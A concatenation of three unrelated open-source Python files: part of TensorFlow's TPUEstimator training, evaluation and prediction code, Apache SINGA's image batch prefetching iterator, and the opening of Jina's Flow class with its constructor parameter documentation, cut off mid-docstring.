return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
scaffold = _get_scaffold(captured_scaffold_fn)
return compile_op, loss, host_calls, scaffold, captured_eval_hooks.get()
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_train_step,
[_INITIAL_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
scaffold = _get_scaffold(captured_scaffold_fn)
return compile_op, loss, host_call, scaffold, captured_training_hooks.get()
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(compile_op, dummy_predict_op,) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
scaffold = _get_scaffold(captured_scaffold_fn)
return (compile_op, dummy_predict_op, host_calls, scaffold,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if isinstance(params, hparam.HParams):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None,
strip_default_attrs=False):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
strip_default_attrs: Boolean. If `True`, default-valued attributes will be
removed from the NodeDefs.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_savedmodel(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path,
strip_default_attrs)
|
data.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
'''
This module includes classes for loading and prefetching data batches.
Example usage::
import image_tool
from PIL import Image
from singa.data import ImageBatchIter
tool = image_tool.ImageTool()
def image_transform(img_path):
global tool
return tool.load(img_path).resize_by_range(
(112, 128)).random_crop(
(96, 96)).flip().get()
data = ImageBatchIter('train.txt', 3,
image_transform, shuffle=True, delimiter=',',
image_folder='images/',
capacity=10)
data.start()
# imgs is a numpy array for a batch of images,
# shape: batch_size, 3 (RGB), height, width
imgs, labels = data.next()
# convert numpy array back into images
for idx in range(imgs.shape[0]):
img = Image.fromarray(imgs[idx].astype(np.uint8).transpose(1, 2, 0),
'RGB')
img.save('img%d.png' % idx)
data.end()
'''
from __future__ import print_function
from __future__ import absolute_import
from builtins import range
from builtins import object
import os
import random
import time
from multiprocessing import Process, Queue
import numpy as np
class ImageBatchIter(object):
'''Utility for iterating over an image dataset to get mini-batches.
Args:
img_list_file(str): name of the file containing image meta data; each
line consists of image_path_suffix delimiter meta_info,
where meta info could be label index or label strings, etc.
meta_info should not contain the delimiter. If the meta_info
of each image is just the label index, then we will parse the
label index into a numpy array with length=batchsize
(for compatibility); otherwise, we return a list of meta_info;
if meta info is available, we return a list of None.
batch_size(int): num of samples in one mini-batch
image_transform: a function for image augmentation; it accepts the full
image path and outputs a list of augmented images.
shuffle(boolean): True for shuffling images in the list
delimiter(char): delimiter between image_path_suffix and label, e.g.,
space or comma
image_folder(boolean): prefix of the image path
capacity(int): the max num of mini-batches in the internal queue.
'''
def __init__(self,
img_list_file,
batch_size,
image_transform,
shuffle=True,
delimiter=' ',
image_folder=None,
capacity=10):
self.img_list_file = img_list_file
self.queue = Queue(capacity)
self.batch_size = batch_size
self.image_transform = image_transform
self.shuffle = shuffle
self.delimiter = delimiter
self.image_folder = image_folder
self.stop = False
self.p = None
with open(img_list_file, 'r') as fd:
self.num_samples = len(fd.readlines())
def start(self):
self.p = Process(target=self.run)
self.p.start()
return
def __next__(self):
assert self.p is not None, 'call start before next'
while self.queue.empty():
time.sleep(0.1)
x, y = self.queue.get() # dequeue one mini-batch
return x, y
def end(self):
if self.p is not None:
self.stop = True
time.sleep(0.1)
self.p.terminate()
def run(self):
img_list = []
is_label_index = True
for line in open(self.img_list_file, 'r'):
item = line.strip('\n').split(self.delimiter)
if len(item) < 2:
is_label_index = False
img_list.append((item[0].strip(), None))
else:
if not item[1].strip().isdigit():
# the meta info is not label index
is_label_index = False
img_list.append((item[0].strip(), item[1].strip()))
index = 0 # index for the image
if self.shuffle:
random.shuffle(img_list)
while not self.stop:
if not self.queue.full():
x, y = [], []
i = 0
while i < self.batch_size:
img_path, img_meta = img_list[index]
aug_images = self.image_transform(
os.path.join(self.image_folder, img_path))
assert i + len(aug_images) <= self.batch_size, \
'too many images (%d) in a batch (%d)' % \
(i + len(aug_images), self.batch_size)
for img in aug_images:
ary = np.asarray(img.convert('RGB'), dtype=np.float32)
x.append(ary.transpose(2, 0, 1))
if is_label_index:
y.append(int(img_meta))
else:
y.append(img_meta)
i += 1
index += 1
if index == self.num_samples:
index = 0 # reset to the first image
if self.shuffle:
random.shuffle(img_list)
# enqueue one mini-batch
if is_label_index:
self.queue.put((np.asarray(x), np.asarray(y,
dtype=np.int32)))
else:
self.queue.put((np.asarray(x), y))
else:
time.sleep(0.1)
return
if __name__ == '__main__':
from . import image_tool
from PIL import Image
tool = image_tool.ImageTool()
def image_transform(img_path):
global tool
return tool.load(img_path).resize_by_range((112, 128)).random_crop(
(96, 96)).flip().get()
data = ImageBatchIter('train.txt',
3,
image_transform,
shuffle=False,
delimiter=',',
image_folder='images/',
capacity=10)
data.start()
imgs, labels = next(data)
print(labels)
for idx in range(imgs.shape[0]):
img = Image.fromarray(imgs[idx].astype(np.uint8).transpose(1, 2, 0),
'RGB')
img.save('img%d.png' % idx)
data.end()
|
base.py
|
import argparse
import base64
import copy
import json
import multiprocessing
import os
import sys
import threading
import time
import uuid
from collections import OrderedDict
from contextlib import ExitStack
from typing import (
TYPE_CHECKING,
Dict,
List,
Optional,
Set,
Tuple,
Type,
Union,
overload,
)
from rich import print
from rich.panel import Panel
from rich.table import Table
from jina import __default_host__, __default_port_monitoring__, __docker_host__, helper
from jina.clients import Client
from jina.clients.mixin import AsyncPostMixin, PostMixin
from jina.enums import (
DeploymentRoleType,
FlowBuildLevel,
FlowInspectType,
GatewayProtocolType,
)
from jina.excepts import (
FlowMissingDeploymentError,
FlowTopologyError,
PortAlreadyUsed,
RuntimeFailToStart,
)
from jina.helper import (
ArgNamespace,
CatchAllCleanupContextManager,
colored_rich,
download_mermaid_url,
get_internal_ip,
get_public_ip,
get_rich_console,
is_port_free,
typename,
)
from jina.jaml import JAMLCompatible
from jina.logging.logger import JinaLogger
from jina.orchestrate.deployments import Deployment
from jina.orchestrate.flow.builder import _hanging_deployments, allowed_levels
from jina.parsers import (
set_client_cli_parser,
set_deployment_parser,
set_gateway_parser,
)
from jina.parsers.flow import set_flow_parser
__all__ = ['Flow']
from jina.serve.networking import host_is_local, in_docker
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if TYPE_CHECKING:
from jina.clients.base import BaseClient
from jina.orchestrate.flow.asyncio import AsyncFlow
from jina.serve.executors import BaseExecutor
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_deployment_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors."""
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
return_responses: Optional[bool] = False,
tls: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param return_responses: If set, return results as List of Requests instead of a reduced DocArray.
:param tls: If set, connect to gateway using tls encryption
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compression: Optional[str] = 'NoCompression',
cors: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
deployments_addresses: Optional[str] = '{}',
deployments_disable_reduce: Optional[str] = '[]',
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_graphql_endpoint: Optional[bool] = False,
graph_conditions: Optional[str] = '{}',
graph_description: Optional[str] = '{}',
grpc_server_kwargs: Optional[dict] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
log_config: Optional[str] = None,
monitoring: Optional[bool] = False,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
output_array_type: Optional[str] = None,
polling: Optional[str] = 'ANY',
port: Optional[int] = None,
port_monitoring: Optional[int] = 9090,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_cls: Optional[str] = 'GRPCGatewayRuntime',
shards: Optional[int] = 1,
ssl_certfile: Optional[str] = None,
ssl_keyfile: Optional[str] = None,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
timeout_send: Optional[int] = None,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compression: The compression mechanism used when sending requests to Executors. Possibilites are: `NoCompression, Gzip, Deflate`. For more details, check https://grpc.github.io/grpc/python/grpc.html#compression.
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param deployments_addresses: dictionary JSON with the input addresses of each Deployment
:param deployments_disable_reduce: list JSON disabling the built-in merging mechanism for each Deployment listed
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_graphql_endpoint: If set, /graphql endpoint is added to HTTP interface.
:param graph_conditions: Dictionary stating which filtering conditions each Executor in the graph requires to receive Documents.
:param graph_description: Routing graph for the gateway
:param grpc_server_kwargs: Dictionary of kwargs arguments that will be passed to the grpc server when starting the server # todo update
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param monitoring: If set, spawn an http server with a prometheus endpoint to expose metrics
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside WorkerRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param output_array_type: The type of array `tensor` and `embedding` will be serialized to.
Supports the same types as `docarray.to_protobuf(.., ndarray_type=...)`, which can be found
`here <https://docarray.jina.ai/fundamentals/document/serialization/#from-to-protobuf>`.
Defaults to retaining whatever type is returned by the Executor.
:param polling: The polling strategy of the Deployment and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Deployment or by endpoint.
Define per Deployment:
- ANY: only one (whoever is idle) Pod polls the message
- ALL: all Pods poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port: The port for input data to bind to, default is a random port between [49152, 65535]
:param port_monitoring: The port on which the prometheus server is exposed, default port is 9090
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the deployment
:param runtime_cls: The runtime class to run inside the Pod
:param shards: The number of shards in the deployment running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/create-flow/#complex-flow-topologies
:param ssl_certfile: the path to the certificate file
:param ssl_keyfile: the path to the key file
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pod waits for the runtime to be ready, -1 for waiting forever
:param timeout_send: The timeout in milliseconds used when sending data requests to Executors, -1 means no timeout, disabled by default
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
